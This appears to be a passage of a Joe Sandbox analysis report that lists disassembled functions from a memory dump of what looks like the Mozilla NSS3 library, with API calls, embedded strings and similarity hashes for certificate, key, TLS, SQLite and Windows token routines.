Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 0e872dfed4fc8d15219de8d4e9ea07c9150c1d714c799d123ec4064f5237c711
Instruction ID: 7aba05d6edc6663b66c05c53dfb86a5aa0485aae75cbf795ee71f047aa6f76d1
Opcode Fuzzy Hash: 0e872dfed4fc8d15219de8d4e9ea07c9150c1d714c799d123ec4064f5237c711
Instruction Fuzzy Hash: 7002EFB1B043015BE714AF61A88576B36B1BBC570CF14893CD96A87B01EB74E84AC7CB

Function 6C747C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C747C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C747C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C747D1E

Part of subcall function 6C747870: SECOID_FindOID_Util.NSS3(?,?,?,6C7491C5), ref: 6C74788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C747D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C747D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C747DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C747DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C747DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C747E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C747E58

Part of subcall function 6C747870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7491C5), ref: 6C7478BB
Part of subcall function 6C747870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C7491C5), ref: 6C7478FA
Part of subcall function 6C747870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C7491C5), ref: 6C747930
Part of subcall function 6C747870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7491C5), ref: 6C747951
Part of subcall function 6C747870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C747964
Part of subcall function 6C747870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C74797A
Part of subcall function 6C747870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C747988
Part of subcall function 6C747870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C747998
Part of subcall function 6C747870: free.MOZGLUE(00000000), ref: 6C7479A7
Part of subcall function 6C747870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C7491C5), ref: 6C7479BB
Part of subcall function 6C747870: PR_GetCurrentThread.NSS3(?,?,?,?,6C7491C5), ref: 6C7479CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C747E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C747F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C747F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C747FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C747FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C748038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C748050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C748093
SECOID_FindOID_Util.NSS3 ref: 6C747F29

Part of subcall function 6C7407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6E8298,?,?,?,6C6DFCE5,?), ref: 6C7407BF
Part of subcall function 6C7407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7407E6
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C74081B
Part of subcall function 6C7407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C740825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C748072
SECOID_FindOID_Util.NSS3 ref: 6C7480F5

Part of subcall function 6C74BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C74800A,00000000,?,00000000,?), ref: 6C74BC3F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: ec01ecf8c7b94d632f280ace5c003aab1f16a4de7171b7219cae57f2271ed2ad
Instruction ID: 1de47ebdccc286cc069667a91ab5cc82012117b0781395d278a3e6889b9a6e3f
Opcode Fuzzy Hash: ec01ecf8c7b94d632f280ace5c003aab1f16a4de7171b7219cae57f2271ed2ad
Instruction Fuzzy Hash: 61E1B2716083009FE710CF29CA84B6B77E5AF45318F148A6DE9999BB61E731EC05CB92

Function 6C6D1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C6D1C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C6D1C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C6D1CA1
GetLengthSid.ADVAPI32(?), ref: 6C6D1CA9
malloc.MOZGLUE(00000000), ref: 6C6D1CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6D1CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C6D1CE4
GetLengthSid.ADVAPI32(?), ref: 6C6D1CEC
malloc.MOZGLUE(00000000), ref: 6C6D1CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C6D1D0F
CloseHandle.KERNEL32(?), ref: 6C6D1D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C6D1D4D
GetLastError.KERNEL32 ref: 6C6D1D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C6D1D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C6D1D7A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: a92b598e83bbd6a68c23fca4c5b5a9565237458d53c204ef17fcba792be150c8
Instruction ID: 848636faf1b9a92b6d1aa9859c8147be26d6932ea5db41b4d415f6e80f582f41
Opcode Fuzzy Hash: a92b598e83bbd6a68c23fca4c5b5a9565237458d53c204ef17fcba792be150c8
Instruction Fuzzy Hash: 353155F56012189FEB30AF64CD48BAA7BF8FF4A349F004575F50992251E7305994CFA5

Function 6C6D3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6D3DFB
__allrem.LIBCMT ref: 6C6D3EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6D3FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6D4047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6D40DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6D415F
__allrem.LIBCMT ref: 6C6D416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6D4288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6D42AB
__allrem.LIBCMT ref: 6C6D42B7

Strings

%02d, xrefs: 6C6D4086
%lld, xrefs: 6C6D3FB2
%04d, xrefs: 6C6D407B
%03d, xrefs: 6C6D42E8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 246f3e12896b95278d09870ad15380ac125b6d66e1e055652209290583d55094
Instruction ID: 87f42b8dc19436a95e08cdbef0bbdb604cbb885dc6ce490e30fc752d76e840f4
Opcode Fuzzy Hash: 246f3e12896b95278d09870ad15380ac125b6d66e1e055652209290583d55094
Instruction Fuzzy Hash: 7BF13271A087409FD315CF38C881AABB7F6AF86308F158A2DE495D7751EB70E845CB46

Function 6C6DEF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DEF63

Part of subcall function 6C6E87D0: PORT_NewArena_Util.NSS3(00000800,6C6DEF74,00000000), ref: 6C6E87E8
Part of subcall function 6C6E87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C6DEF74,00000000), ref: 6C6E87FD
Part of subcall function 6C6E87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6E884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C6DF2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DF2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C6DF30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C6DF374
PL_strcasecmp.NSS3(6C822FD4,?), ref: 6C6DF457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C6DF4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6DF66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C6DF67D
CERT_DestroyName.NSS3(?), ref: 6C6DF68B

Part of subcall function 6C6E8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C6E8338
Part of subcall function 6C6E8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6E8364
Part of subcall function 6C6E8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C6E838E
Part of subcall function 6C6E8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E83A5
Part of subcall function 6C6E8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E83E3

Part of subcall function 6C6E84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C6E84D9
Part of subcall function 6C6E84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6E8528

Part of subcall function 6C6E8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C6E8955

Strings

*, xrefs: 6C6DF3C6
oid., xrefs: 6C6DF2CF
", xrefs: 6C6DF21B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: a2e3c3be6f9efc173ed560076b1b27f63e14a84e96e29fb083ef7b2b2ceb508a
Instruction ID: 6969ef0060ed1af98cd791fd643f630243f75a33240ec27a104f5c4edf4932e5
Opcode Fuzzy Hash: a2e3c3be6f9efc173ed560076b1b27f63e14a84e96e29fb083ef7b2b2ceb508a
Instruction Fuzzy Hash: 6F225A71A0C3414BD314CE69C89036AB7E6AFC931CF1A4A2EE5D587B91E731AC45C78B

Function 6C681C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C681D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C681EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C681FB7

Strings

sqlite_temp_master, xrefs: 6C681C5C
abort due to ROLLBACK, xrefs: 6C682223
no more rows available, xrefs: 6C682264
unknown error, xrefs: 6C682291
unsupported file format, xrefs: 6C682188
table, xrefs: 6C681C8B
attached databases must use the same text encoding as main database, xrefs: 6C6820CA
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C681F83
sqlite_master, xrefs: 6C681C61
another row available, xrefs: 6C682287

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: 0fac666f9300bf5a388e63f6767bb0780c2071cd50817550a649836fb73d8dbe
Instruction ID: 611e44b6a0482f13def18ba0871a68e58abf708aab267ec96e2ccd6152ec1c96
Opcode Fuzzy Hash: 0fac666f9300bf5a388e63f6767bb0780c2071cd50817550a649836fb73d8dbe
Instruction Fuzzy Hash: 8D1225706093018FD710CF19C494B5AB7F2BF85318F18896DE9958BB52D731EC4ACBAA

Function 6C6A5F20 Relevance: 22.5, APIs: 5, Strings: 8, Instructions: 3043COMMON

Download Yara Rule

Strings

-, xrefs: 6C6A6228
BINARY, xrefs: 6C6A8708, 6C6A8737, 6C6A87B8
NOCASE, xrefs: 6C6A8703
ON clause references tables to its right, xrefs: 6C6A6BEC
-, xrefs: 6C6A62F9
2, xrefs: 6C6A65B4
u, xrefs: 6C6A81DA
sub-select returns %d columns - expected %d, xrefs: 6C6A805F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
API String ID: 0-3593521594
Opcode ID: df91f1af431582596ab53e0ba3182eda5ac46c3c0d43b47c4818c9f9d0098fc1
Instruction ID: e24ee7ca5935e8581a4a9af6c05501b2867ff264e8514d2a365888a3c67c4fac
Opcode Fuzzy Hash: df91f1af431582596ab53e0ba3182eda5ac46c3c0d43b47c4818c9f9d0098fc1
Instruction Fuzzy Hash: 034360746083418FD304CF59C490B5AB7E2FF89318F148A6DE8998B766D731EC46CB9A

Function 6C74EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C74C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C74DAE2,?), ref: 6C74C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C74F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C74F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C74F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C74F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C81218C), ref: 6C74F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C74F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C74F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C74F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C74F210

Part of subcall function 6C6F52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C74F1E9,?,00000000,?,?), ref: 6C6F52F5
Part of subcall function 6C6F52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C6F530F
Part of subcall function 6C6F52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C6F5326
Part of subcall function 6C6F52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C74F1E9,?,00000000,?,?), ref: 6C6F5340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C74F227

Part of subcall function 6C73FAB0: free.MOZGLUE(?,-00000001,?,?,6C6DF673,00000000,00000000), ref: 6C73FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C74F23E

Part of subcall function 6C73BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6EE708,00000000,00000000,00000004,00000000), ref: 6C73BE6A
Part of subcall function 6C73BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6F04DC,?), ref: 6C73BE7E
Part of subcall function 6C73BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C73BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C74F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C74F3A8

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C74F3B3

Part of subcall function 6C6F2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C6F2D3C
Part of subcall function 6C6F2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6F2D5F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 75e96ae3c635f28efa7f8ce88798c8eb21a9a482066330b15f0943f8d2cba69d
Instruction ID: ad6960b37653dea891fd0e42bfdcd84e5b3ee6c191c9b9fdb0cc585da36c0d4f
Opcode Fuzzy Hash: 75e96ae3c635f28efa7f8ce88798c8eb21a9a482066330b15f0943f8d2cba69d
Instruction Fuzzy Hash: 2AD18EB6E012159FEB14CFA9DA84AAEB7F6EF48308F15C039D915A7711E731E806CB50

Function 6C77DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C757FFA,00000000,?,6C7823B9,00000002,00000000,?,6C757FFA,00000002), ref: 6C77DE33

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

Part of subcall function 6C77D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C77DE74,6C757FFA,00000002,?,?,?,?,?,00000000,6C757FFA,00000000,?,6C7823B9,00000002), ref: 6C77D008

PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C757FFA,00000000,?,6C7823B9,00000002,00000000,?,6C757FFA,00000002), ref: 6C77DE57
memset.VCRUNTIME140(?,00000000,00000088), ref: 6C77DEA5
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C77E069
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C77E121
PK11_FreeSymKey.NSS3(?), ref: 6C77E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C77E195
PR_GetCurrentThread.NSS3 ref: 6C77E1FC

Part of subcall function 6C772460: PR_SetError.NSS3(FFFFE005,00000000,6C817379,00000002,?), ref: 6C772493

Strings

application data, xrefs: 6C77DFE0
key, xrefs: 6C77E046
handshake data, xrefs: 6C77DFF7
early application data, xrefs: 6C77DFC9

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 635e26a7b6767654544cf626131ffd19f3d6f9cb464a919dc2491be530595473
Instruction ID: 746f11222d3d155853d3b7d11e4a3ce28277906e3e3e503c788aaae0575dd34a
Opcode Fuzzy Hash: 635e26a7b6767654544cf626131ffd19f3d6f9cb464a919dc2491be530595473
Instruction Fuzzy Hash: 20C1D371A002099FDF24CF69CE88BEAB7B4FF05318F144139E9199BA51E331E954CBA1

Function 6C66ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C66EF98

Strings

database corruption, xrefs: 6C66F48D
%s at line %d of [%.10s], xrefs: 6C66F492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C66F483

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 39b3c0defc8feca456175d538bdbbcea71f33032532333eeacf0d08f6dee451f
Instruction ID: d6a8896a45ae31dfbde4493e72b68ce1dbdef097ff4680c0710fa9772b16e3af
Opcode Fuzzy Hash: 39b3c0defc8feca456175d538bdbbcea71f33032532333eeacf0d08f6dee451f
Instruction Fuzzy Hash: 7462FF30A042458FDB14CF6AC884B9ABBF1BF4531CF184198D8556BF92D735E886CB9B

Function 6C70FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C70FD06

Part of subcall function 6C70F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C70F696
Part of subcall function 6C70F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C70F789
